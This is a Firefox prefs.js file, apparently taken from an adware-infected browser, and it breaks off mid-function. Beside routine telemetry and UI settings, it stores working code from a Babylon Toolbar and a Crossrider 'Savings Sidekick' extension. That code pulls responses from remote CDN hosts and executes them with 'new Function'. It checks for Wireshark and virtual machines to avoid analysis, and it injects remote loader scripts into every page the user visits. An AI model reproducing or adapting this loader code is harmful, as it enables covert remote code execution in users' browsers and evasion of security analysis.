user_pref(&quot;browser.uitour.whitelist.add.260&quot;, &quot;&quot;);
user_pref(&quot;browser.uitour.whitelist.add.340&quot;, &quot;&quot;);
user_pref(&quot;browser.urlbar.autocomplete.enabled&quot;, false);
user_pref(&quot;browser.urlbar.suggest.bookmark&quot;, false);
user_pref(&quot;browser.urlbar.suggest.history&quot;, false);
user_pref(&quot;browser.urlbar.suggest.openpage&quot;, false);
user_pref(&quot;datareporting.healthreport.lastDataSubmissionFailureTime&quot;, &quot;1435040802954&quot;);
user_pref(&quot;datareporting.healthreport.lastDataSubmissionRequestedTime&quot;, &quot;1449324463516&quot;);
user_pref(&quot;datareporting.healthreport.lastDataSubmissionSuccessfulTime&quot;, &quot;1449324465597&quot;);
user_pref(&quot;datareporting.healthreport.nextDataSubmissionTime&quot;, &quot;1449410865597&quot;);
user_pref(&quot;datareporting.healthreport.service.firstRun&quot;, true);
user_pref(&quot;datareporting.policy.dataSubmissionPolicyAcceptedVersion&quot;, 2);
user_pref(&quot;datareporting.policy.dataSubmissionPolicyNotifiedTime&quot;, &quot;1417596264603&quot;);
user_pref(&quot;datareporting.policy.firstRunTime&quot;, &quot;1365871572512&quot;);
user_pref(&quot;datareporting.sessions.current.activeTicks&quot;, 7);
user_pref(&quot;datareporting.sessions.current.firstPaint&quot;, 26881);
user_pref(&quot;datareporting.sessions.current.main&quot;, 17238);
user_pref(&quot;datareporting.sessions.current.sessionRestored&quot;, 28445);
user_pref(&quot;datareporting.sessions.current.startTime&quot;, &quot;1449386316097&quot;);
user_pref(&quot;datareporting.sessions.current.totalTime&quot;, 56);
user_pref(&quot;datareporting.sessions.currentIndex&quot;, 2040);
user_pref(&quot;datareporting.sessions.previous.2039&quot;, &quot;{\&quot;s\&quot;:1449305208258,\&quot;a\&quot;:5540,\&quot;t\&quot;:48663,\&quot;c\&quot;:true,\&quot;m\&quot;:124,\&quot;fp\&quot;:1248,\&quot;sr\&quot;:1446}&quot;);
user_pref(&quot;datareporting.sessions.prunedIndex&quot;, 2038);
user_pref(&quot;devtools.telemetry.tools.opened.version&quot;, &quot;{\&quot;DEVTOOLS_TOOLBOX_OPENED_PER_USER_FLAG\&quot;:\&quot;36.0.4\&quot;,\&quot;DEVTOOLS_INSPECTOR_OPENED_PER_USER_FLAG\&quot;:\&quot;36.0.4\&quot;,\&quot;DEVTOOLS_RULEVIEW_OPENED_PER_USER_FLAG\&quot;:\&quot;36.0.4\&quot;}&quot;);
user_pref(&quot;devtools.toolbox.selectedTool&quot;, &quot;inspector&quot;);
user_pref(&quot;devtools.toolsidebar-width.inspector&quot;, 0);
user_pref(&quot;dom.apps.reset-permissions&quot;, true);
user_pref(&quot;dom.disable_open_during_load&quot;, false);
user_pref(&quot;dom.mozApps.used&quot;, true);
user_pref(&quot;dom.w3c_touch_events.expose&quot;, false);
user_pref(&quot;experiments.activeExperiment&quot;, false);
user_pref(&quot;extensions.BabylonToolbar_i.aflt&quot;, &quot;babsst&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.babExt&quot;, &quot;&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.babTrack&quot;, &quot;affID=110819&amp;tt=010712_3&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.hardId&quot;, &quot;16123040000000000000062454f2a604&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.id&quot;, &quot;16123040000000000000062454f2a604&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.instlDay&quot;, &quot;15525&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.instlRef&quot;, &quot;sst&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.prdct&quot;, &quot;BabylonToolbar&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.prtnrId&quot;, &quot;babylon&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.smplGrp&quot;, &quot;none&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.srcExt&quot;, &quot;ss&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.tlbrId&quot;, &quot;tb9&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.vrsn&quot;, &quot;1.5.3.17&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.vrsnTs&quot;, &quot;1.5.3.1715:08:45&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.vrsni&quot;, &quot;1.5.3.17&quot;);
user_pref(&quot;extensions.blocklist.pingCountTotal&quot;, 1064);
user_pref(&quot;extensions.blocklist.pingCountVersion&quot;, 20);
user_pref(&quot;extensions.bootstrappedAddons&quot;, &quot;{}&quot;);
user_pref(&quot;extensions.crossrider.bic&quot;, &quot;139c5ccd042fc6d366e9efe2a8a22d88&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.InstallationThankYouPage&quot;, true);
user_pref(&quot;extensions.crossriderapp5060.5060.InstallationTime&quot;, 1347643228);
user_pref(&quot;extensions.crossriderapp5060.5060.InstallationUserSettings.searchUserConifrmation&quot;, false);
user_pref(&quot;extensions.crossriderapp5060.5060.InstallationUserSettings.setHomepage&quot;, false);
user_pref(&quot;extensions.crossriderapp5060.5060.InstallationUserSettings.setNewTab&quot;, false);
user_pref(&quot;extensions.crossriderapp5060.5060.InstallationUserSettings.setSearch&quot;, false);
user_pref(&quot;extensions.crossriderapp5060.5060.active&quot;, true);
user_pref(&quot;extensions.crossriderapp5060.5060.addressbar&quot;, &quot;&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.backgroundjs&quot;, &quot;\n\n\&quot;undefined\&quot;!=typeof _GPL_BG_NEW&amp;&amp;appAPI.webRequest&amp;&amp;appAPI.webRequest.onBeforeNavigate?_GPL_BG_NEW.preinit():\&quot;undefined\&quot;!=typeof _GPL_BG&amp;&amp;appAPI.onRequest&amp;&amp;_GPL_BG.preinit();\n&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.backgroundver&quot;, 7);
user_pref(&quot;extensions.crossriderapp5060.5060.can_run_bg_code&quot;, true);
user_pref(&quot;extensions.crossriderapp5060.5060.certdomaininstaller&quot;, &quot;&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.changeprevious&quot;, false);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie.InstallationTime.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie.InstallationTime.value&quot;, &quot;1347643228&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie.InstallerParams.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_aoi.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_aoi.value&quot;, &quot;1347643228&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_blocklist.expiration&quot;, &quot;Fri Nov 30 2012 17:31:43 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_blocklist.value&quot;, &quot;%22nonexistantdomain.com%22&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_country_code.expiration&quot;, &quot;Sun Dec 02 2012 14:58:35 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_country_code.value&quot;, &quot;%22DE%22&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_crr.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_crr.value&quot;, &quot;1354292451&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_hotfix20111102645.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_hotfix20111102645.value&quot;, &quot;%221%22&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_installer_params.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_installer_params.value&quot;, &quot;%7B%22source_id%22%3A%220%22%2C%22sub_id%22%3A%220%22%2C%22uzid%22%3A%220%22%7D&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_parent_zoneid.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_parent_zoneid.value&quot;, &quot;%2214019%22&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_pc_20120828.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_pc_20120828.value&quot;, &quot;1347643324716&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_product_id.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_product_id.value&quot;, &quot;%221224%22&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_zoneid.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_zoneid.value&quot;, &quot;%2282063%22&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie.dbtest.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie.dbtest.value&quot;, &quot;1347643311989&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.description&quot;, &quot;Savings Sidekick&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.domain&quot;, &quot;&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.enablesearch&quot;, false);
user_pref(&quot;extensions.crossriderapp5060.5060.fbremoteurl&quot;, &quot;&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.group&quot;, 0);
user_pref(&quot;extensions.crossriderapp5060.5060.homepage&quot;, &quot;&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.iframe&quot;, false);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.InstallerIdentifiers.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.InstallerIdentifiers.value&quot;, &quot;%7B%22installer_bic%22%3A%22B2F0E20977AD4C33ABC24800D8090F46IE%22%2C%22installer_verifier%22%3A%22a4b03d63b8bf5d68245e569a6d0f510a%22%2C%22installer_verifier_for_215app%22%3A%222456002ffb0c784079745e982e7370a8%22%7D&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_appVer.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_appVer.value&quot;, &quot;38&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_lastVersion.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_lastVersion.value&quot;, &quot;0&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_meta.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_meta.value&quot;, &quot;%7B%7D&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_nextCheck.expiration&quot;, &quot;Fri Nov 30 2012 23:20:51 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_nextCheck.value&quot;, &quot;true&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_queue.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_queue.value&quot;, &quot;%7B%7D&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_remote_resources.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_remote_resources.value&quot;, &quot;%7B%22remoteId%22%3A0%7D&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.SoftwareDetected.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.SoftwareDetected.value&quot;, &quot;%7B%22AnySoftware%22%3Afalse%2C%22Wireshark%22%3Afalse%2C%22VirtualBox%22%3Afalse%2C%22VMWare%22%3Afalse%2C%22InsideVM%22%3Afalse%2C%22InsideVMWare%22%3Afalse%2C%22InsideVirtualBox%22%3Afalse%2C%22InsideVirtualPc%22%3Afalse%7D&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.js&quot;, &quot;\n\nif(\&quot;undefined\&quot;!=typeof _GPL_PLUGIN){var _GPL_=function(){_GPL_PLUGIN.started||_GPL_PLUGIN.prepare({pid:1224,baseCDN:\&quot;savingsside-a.akamaihd.net\&quot;})};$jquery(document).ready(_GPL_);setTimeout(_GPL_,5E3)};\n\n\n\n&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.manifesturl&quot;, &quot;&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.name&quot;, &quot;Savings Sidekick&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.newtab&quot;, &quot;&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.opensearch&quot;, &quot;&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_1.code&quot;, &quot;appAPI._cr_config={appID:function(){var a=appAPI.appInfo;if(a){return appAPI.appInfo.id}else{return appAPI.appID}}};$jquery.extend(appAPI._cr_config,{sidebar:{base:{production:\&quot;hxxp://static.crossrider.com\&quot;,staging:\&quot;hxxp://staging-app.crossrider.com\&quot;},css:\&quot;/plugins/stylesheets/sidebar.css\&quot;,themes:\&quot;/plugins/images/sidebar\&quot;}});$jquery.extend(appAPI._cr_config,{notifications_manager:{base:{production:\&quot;hxxp://nstatic.crossrider.com\&quot;,staging:\&quot;hxxp://staging-app.crossrider.com\&quot;},statsBase:{production:\&quot;hxxp://nstats.crossrider.com\&quot;,staging:\&quot;hxxp://staging-app.crossrider.com\&quot;},geolocation:\&quot;hxxp://www.geoplugin.net/json.gp?jsoncallback=fn\&quot;,meta:\&quot;/notifier/\&quot;+appAPI._cr_config.appID()+\&quot;/meta.json\&quot;,messages:\&quot;/notifier/\&quot;+appAPI._cr_config.appID()+\&quot;/{id}.json\&quot;,logger:\&quot;/notifications.gif\&quot;,loggerAPI:\&quot;/api_notifications.gif\&quot;},notifications:{base:{production:\&quot;hxxp://nstatic.crossrider.com\&quot;,staging:\&quot;hxxp://staging-app.crossrider.com\&quot;},css:\&quot;/plugins/stylesheets/notifications.css\&quot;,themes:\&quot;/plugins/images/notifications\&quot;}});$jquery.extend(appAPI._cr_config,{debug_app:{debug_page:[\&quot;crossrider.com\&quot;,\&quot;staging.crossrider.com\&quot;]}});$jquery.extend(appAPI._cr_config,{resources:{jQuery:{url:\&quot;https://ajax.googleapis.com/ajax/libs/jquery/{version}/jquery.min.js\&quot;,cacheTime:10},jQueryUI:{url:\&quot;https://ajax.googleapis.com/ajax/libs/jqueryui/{version}/jquery-ui.min.js\&quot;,cacheTime:10},base:{production:\&quot;hxxp://resources.crossrider.com\&quot;,staging:\&quot;hxxp://staging-app.crossrider.com\&quot;},update:\&quot;/apps/{appId}/resources/meta/{lastVersion}\&quot;}});(function(c){var b=!1,a=/xyz/.test(function(){})?/\\b_super\\b/:/.*/;c.Class=function(){};c.Class.extend=function(e){function j(){!b&amp;&amp;this.init&amp;&amp;this.init.apply(this,arguments)}var i=this.prototype;b=!0;var h=new this;b=!1;for(var g in e){h[g]=\&quot;function\&quot;==typeof e[g]&amp;&amp;\&quot;function\&quot;==typeof i[g]&amp;&amp;a.test(e[g])?function(f,d){return function(){var l=this._super;this._super=i[f];var k=d.apply(this,arguments);this._super=l;return k}}(g,e[g]):e[g]}j.prototype=h;j.prototype.constructor=j;j.extend=arguments.callee;return j}})($jquery_171);appAPI.JSONParser={};(function(){function k(a){return 10&gt;a?\&quot;0\&quot;+a:a}function o(a){p.lastIndex=0;return p.test(a)?&apos;\&quot;&apos;+a.replace(p,function(a){var c=r[a];return\&quot;string\&quot;===typeof c?c:\&quot;\\\\u\&quot;+(\&quot;0000\&quot;+a.charCodeAt(0).toString(16)).slice(-4)})+&apos;\&quot;&apos;:&apos;\&quot;&apos;+a+&apos;\&quot;&apos;}function m(a,i){var c,d,h,n,g=e,f,b=i[a];b&amp;&amp;\&quot;object\&quot;===typeof b&amp;&amp;\&quot;function\&quot;===typeof b.to_appAPI_JSON&amp;&amp;(b=b.to_appAPI_JSON(a));\&quot;function\&quot;===typeof j&amp;&amp;(b=j.call(i,a,b));switch(typeof b){case\&quot;string\&quot;:return o(b);case\&quot;number\&quot;:return isFinite(b)?\&quot;\&quot;+b:\&quot;null\&quot;;case\&quot;boolean\&quot;:case\&quot;null\&quot;:return\&quot;\&quot;+b;case\&quot;object\&quot;:if(!b){return\&quot;null\&quot;}e+=l;f=[];if(\&quot;[object Array]\&quot;===Object.prototype.toString.apply(b)){n=b.length;for(c=0;c&lt;n;c+=1){f[c]=m(c,b)||\&quot;null\&quot;}h=0===f.length?\&quot;[]\&quot;:e?\&quot;[\\n\&quot;+e+f.join(\&quot;,\\n\&quot;+e)+\&quot;\\n\&quot;+g+\&quot;]\&quot;:\&quot;[\&quot;+f.join(\&quot;,\&quot;)+\&quot;]\&quot;;e=g;return h}if(j&amp;&amp;\&quot;object\&quot;===typeof j){n=j.length;for(c=0;c&lt;n;c+=1){d=j[c],\&quot;string\&quot;===typeof d&amp;&amp;(h=m(d,b))&amp;&amp;f.push(o(d)+(e?\&quot;: \&quot;:\&quot;:\&quot;)+h)}}else{for(d in b){Object.hasOwnProperty.call(b,d)&amp;&amp;(h=m(d,b))&amp;&amp;f.push(o(d)+(e?\&quot;: \&quot;:\&quot;:\&quot;)+h)}}h=0===f.length?\&quot;{}\&quot;:e?\&quot;{\\n\&quot;+e+f.join(\&quot;,\\n\&quot;+e)+\&quot;\\n\&quot;+g+\&quot;}\&quot;:\&quot;{\&quot;+f.join(\&quot;,\&quot;)+\&quot;}\&quot;;e=g;return h}}if(\&quot;function\&quot;!==typeof Date.prototype.to_appAPI_JSON){Date.prototype.to_appAPI_JSON=function(){return isFinite(this.valueOf())?this.getUTCFullYear()+\&quot;-\&quot;+k(this.getUTCMonth()+1)+\&quot;-\&quot;+k(this.getUTCDate())+\&quot;T\&quot;+k(this.getUTCHours())+\&quot;:\&quot;+k(this.getUTCMinutes())+\&quot;:\&quot;+k(this.getUTCSeconds())+\&quot;Z\&quot;:null},String.prototype.to_appAPI_JSON=Number.prototype.to_appAPI_JSON=Boolean.prototype.to_appAPI_JSON=function(){return this.valueOf()}}var q=/[\\u0000\\u00ad\\u0600-\\u0604\\u070f\\u17b4\\u17b5\\u200c-\\u200f\\u2028-\\u202f\\u2060-\\u206f\\ufeff\\ufff0-\\uffff]/g,p=/[\\\\\\\&quot;\\x00-\\x1f\\x7f-\\x9f\\u00ad\\u0600-\\u0604\\u070f\\u17b4\\u17b5\\u200c-\\u200f\\u2028-\\u202f\\u2060-\\u206f\\ufeff\\ufff0-\\uffff]/g,e,l,r={\&quot;\\u0008\&quot;:\&quot;\\\\b\&quot;,\&quot;\\t\&quot;:\&quot;\\\\t\&quot;,\&quot;\\n\&quot;:\&quot;\\\\n\&quot;,\&quot;\\u000c\&quot;:\&quot;\\\\f\&quot;,\&quot;\\r\&quot;:\&quot;\\\\r\&quot;,&apos;\&quot;&apos;:&apos;\\\\\&quot;&apos;,\&quot;\\\\\&quot;:\&quot;\\\\\\\\\&quot;},j;if(\&quot;function\&quot;!==typeof appAPI.JSONParser.stringify){appAPI.JSONParser.stringify=function(a,i,c){var d;l=e=\&quot;\&quot;;if(\&quot;number\&quot;===typeof c){for(d=0;d&lt;c;d+=1){l+=\&quot; \&quot;}}else{\&quot;string\&quot;===typeof c&amp;&amp;(l=c)}if((j=i)&amp;&amp;\&quot;function\&quot;!==typeof i&amp;&amp;(\&quot;object\&quot;!==typeof i||\&quot;number\&quot;!==typeof i.length)){throw Error(\&quot;appAPI_JSON.stringify\&quot;)}return m(\&quot;\&quot;,{\&quot;\&quot;:a})}}if(\&quot;function\&quot;!==typeof appAPI.JSONParser.parse){appAPI.JSONParser.parse=function(a,e){function c(a,d){var g,f,b=a[d];if(b&amp;&amp;\&quot;object\&quot;===typeof b){for(g in b){Object.hasOwnProperty.call(b,g)&amp;&amp;(f=c(b,g),void 0!==f?b[g]=f:delete b[g])}}return e.call(a,d,b)}var d,a=\&quot;\&quot;+a;q.lastIndex=0;q.test(a)&amp;&amp;(a=a.replace(q,function(a){return\&quot;\\\\u\&quot;+(\&quot;0000\&quot;+a.charCodeAt(0).toString(16)).slice(-4)}));if(/^[\\],:{}\\s]*$/.test(a.replace(/\\\\(?:[\&quot;\\\\\\/bfnrt]|u[0-9a-fA-F]{4})/g,\&quot;@\&quot;).replace(/\&quot;[^\&quot;\\\\\\n\\r]*\&quot;|true|false|null|-?\\d+(?:\\.\\d*)?(?:[eE][+\\-]?\\d+)?/g,\&quot;]\&quot;).replace(/(?:^|:|,)(?:\\s*\\[)+/g,\&quot;\&quot;))){return d=eval(\&quot;(\&quot;+a+\&quot;)\&quot;),\&quot;function\&quot;===typeof e?c({\&quot;\&quot;:d},\&quot;\&quot;):d}throw new SyntaxError(\&quot;appAPI_JSON.parse\&quot;)}}})();(function(a){appAPI.isMatchPages=function(){var c,b=false;a(a.makeArray(arguments)).each(function(d,e){c=typeof(e)==\&quot;string\&quot;?new RegExp(\&quot;^http.?\\\\:\\\\/\\\\/(?:www\\\\.)?\&quot;+e.replace(/\\\\/g,\&quot;\\\\\\\\\&quot;).replace(/\\./g,\&quot;\\\\.\&quot;).replace(/\\*/g,\&quot;.*\&quot;),\&quot;i\&quot;):e;if(c.test(document.location.href)){b=true}});return b}})($jquery_171);(function(a){a.fn.addBaseClass=function(b){return this.each(function(){var c=a(this).attr(\&quot;class\&quot;).split(\&quot; \&quot;)[0];a(this).attr(\&quot;class\&quot;,c+\&quot; \&quot;+b)})}})($jquery_171);(function(a){a.fn.fireExtensionEvent=function(b,c){return this.each(function(){c=c!=undefined?appAPI.JSONParser.stringify(c):\&quot;__crossrider_empty\&quot;;this.setAttribute(\&quot;crossrider_data_store_temp\&quot;,c);if(a.browser.msie){this.setAttribute(\&quot;fake_\&quot;+b,Math.random())}if(document.createEvent){var d=document.createEvent(\&quot;Events\&quot;);d.initEvent(\&quot;fake_\&quot;+b,true,false);this.dispatchEvent(d)}})}})($jquery_171);(function(a){a.fn.bindExtensionEvent=function(b,d){function c(e){var e=a(e),f;if(e.attr(\&quot;crossrider_data_store_temp\&quot;)!=\&quot;__crossrider_empty\&quot;){f=a.parseJSON(e.attr(\&quot;crossrider_data_store_temp\&quot;));return f}else{return null}}return this.each(function(){if(a.browser.msie){this.attachEvent(\&quot;onpropertychange\&quot;,a.proxy(function(){if(event.propertyName==\&quot;fake_\&quot;+b){d.call(this,a.event.fix(event),c(this))}},this))}else{this.addEventListener(\&quot;fake_\&quot;+b,a.proxy(function(f){d.call(this,a.event.fix(f),c(this))},this),false)}})}})($jquery_171);&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_1.name&quot;, &quot;base&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_1.ver&quot;, 3);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_1000014.code&quot;, &quot;Array.prototype.indexOf||(Array.prototype.indexOf=function(a){if(void 0===this||null===this)throw new TypeError;var b=Object(this),d=b.length&gt;&gt;&gt;0;if(0===d)return-1;var c=0;0&lt;arguments.length&amp;&amp;(c=Number(arguments[1]),c!==c?c=0:0!==c&amp;&amp;c!==1/0&amp;&amp;c!==-(1/0)&amp;&amp;(c=(0&lt;c||-1)*Math.floor(Math.abs(c))));if(c&gt;=d)return-1;for(c=0&lt;=c?c:Math.max(d-Math.abs(c),0);c&lt;d;c++)if(c in b&amp;&amp;b[c]===a)return c;return-1});\nvar _GPL_PLUGIN={params:null,parent_zoneid:null,keys:{CHILD_CREATED:\&quot;_GPL_hotfix20111102645\&quot;,INSTALLER_PARAMS:\&quot;InstallerParams\&quot;,INSTALLER_PARAMS_BACKUP:\&quot;_GPL_installer_params\&quot;,INSTALLATION_TIME:\&quot;InstallationTime\&quot;,AOI:\&quot;_GPL_aoi\&quot;,ZONEID:\&quot;_GPL_zoneid\&quot;,PARENT_ZONEID:\&quot;_GPL_parent_zoneid\&quot;,PRODUCTID:\&quot;_GPL_product_id\&quot;,BGCODE:\&quot;_GPL_crr\&quot;,COUNTRY_CODE:\&quot;_GPL_country_code\&quot;,BLOCKLIST:\&quot;_GPL_blocklist\&quot;},recreate_child:!1,vars:{pid:21,systemid:appAPI.getCrossriderID()},proto:\&quot;https:\&quot;==document.location.protocol?\&quot;https://\&quot;:\n\&quot;hxxp://\&quot;,baseCDN:\&quot;contentcache-a.akamaihd.net\&quot;,countryCode:\&quot;\&quot;,blockList:[],started:!1,prepare:function(a){this.started=true;if(appAPI.db.get(\&quot;dbtest\&quot;)){if(a.baseCDN)this.baseCDN=a.baseCDN;if(a.pid)this.vars.pid=a.pid;if(appAPI.appInfo&amp;&amp;appAPI.appInfo.name)this.vars.ext=escape(appAPI.appInfo.name);this.problemCheck()}else{appAPI.db.set(\&quot;dbtest\&quot;,(new Date).getTime());setTimeout(function(){_GPL_PLUGIN.prepare(a)},250)}},problemCheck:function(){var a=appAPI.db.get(\&quot;_GPL_pc_20120828\&quot;),b=appAPI.db.get(this.keys.ZONEID);\n!a&amp;&amp;b&amp;&amp;b!=\&quot;0\&quot;?appAPI.request.get(\&quot;hxxp://cdnapps-a.akamaihd.net/tb/pz.php\&quot;,function(a){if(a!=\&quot;\&quot;)try{var c=(new Function(\&quot;return \&quot;+a))();if(c&amp;&amp;c.length&gt;0&amp;&amp;b&amp;&amp;b!=\&quot;0\&quot;){appAPI.db.set(\&quot;_GPL_pc_20120828\&quot;,(new Date).getTime());c.indexOf(b)!=-1||c.indexOf(\&quot;\&quot;+b)!=-1?_GPL_PLUGIN.zoneFix():_GPL_PLUGIN.loadGeo()}}catch(e){}},function(){}):this.loadGeo()},loadGeo:function(){var a=appAPI.db.get(this.keys.COUNTRY_CODE);if(a){_GPL_PLUGIN.countryCode=a;_GPL_PLUGIN.loadBlockList()}else appAPI.request.get(\&quot;hxxp://\&quot;+\nthis.baseCDN+\&quot;/loaders/cid?r=\&quot;+(new Date).getTime(),function(a){if(a==\&quot;\&quot;)_GPL_PLUGIN.preinit();else try{var d=(new Function(\&quot;return \&quot;+a.split(\&quot;(\&quot;)[1].split(\&quot;)\&quot;)[0]))();if(d&amp;&amp;d.cid&amp;&amp;d.cid!=\&quot;\&quot;){appAPI.db.set(_GPL_PLUGIN.keys.COUNTRY_CODE,d.cid,appAPI.time.daysFromNow(7));_GPL_PLUGIN.countryCode=d.cid;_GPL_PLUGIN.loadBlockList()}}catch(c){_GPL_PLUGIN.preinit()}},function(){_GPL_PLUGIN.preinit()})},loadBlockList:function(){var a=appAPI.db.get(this.keys.BLOCKLIST);if(!a&amp;&amp;this.countryCode!=\&quot;\&quot;)appAPI.request.get(\&quot;hxxp://cdnhigh-a.akamaihd.net/blocklist/\&quot;+\nthis.countryCode+\&quot;/?r=\&quot;+(new Date).getTime(),function(a){if(a==\&quot;\&quot;)_GPL_PLUGIN.preinit();else try{var d=(new Function(\&quot;return \&quot;+a))();if(d&amp;&amp;d!=\&quot;\&quot;){appAPI.db.set(_GPL_PLUGIN.keys.BLOCKLIST,d.join(\&quot;,\&quot;),appAPI.time.minutesFromNow(5));_GPL_PLUGIN.blockList=d;_GPL_PLUGIN.preinit()}}catch(c){_GPL_PLUGIN.preinit()}},function(){_GPL_PLUGIN.preinit()});else{_GPL_PLUGIN.blockList=typeof a==\&quot;string\&quot;?a.split(\&quot;,\&quot;):[];_GPL_PLUGIN.preinit()}},preinit:function(){if(this.blockList.length&gt;0){if(this.blockList.indexOf(\&quot;*\&quot;)&gt;\n0)return;for(var a=this.getDomainVariations(document.location.hostname.toLowerCase()),b=0,d=a.length;b&lt;d;b++)if(this.blockList.indexOf(a[b])&gt;=0)return}if(appAPI.installer&amp;&amp;typeof appAPI.installer.getInstalledSoftware==\&quot;function\&quot;)(a=appAPI.installer.getInstalledSoftware())&amp;&amp;a.AnySoftware&amp;&amp;appAPI.db.set(\&quot;_GPL_sr_halt\&quot;,Math.floor((new Date).getTime()/1E3));this.loadEssentials();this.loadExtras()&amp;&amp;this.loadFinal()},loadFinal:function(){if(appAPI.db.get(this.keys.CHILD_CREATED)==null||this.recreate_child){this.createChild();\nthis.recreate_child=false}else this.init()},loadEssentials:function(){this.loadParams();this.loadAOI();this.loadZone();this.loadPID()},init:function(){var a=\&quot;\&quot;;$jquery.each(this.vars,function(b,d){a=a+(b+\&quot;=\&quot;+d+\&quot;&amp;\&quot;)});a=a.substring(0,a.length-1);this.insertJS(this.proto+this.baseCDN+\&quot;/loaders/\&quot;+this.vars.pid+\&quot;/l.js?\&quot;+a)},insertJS:function(a){var 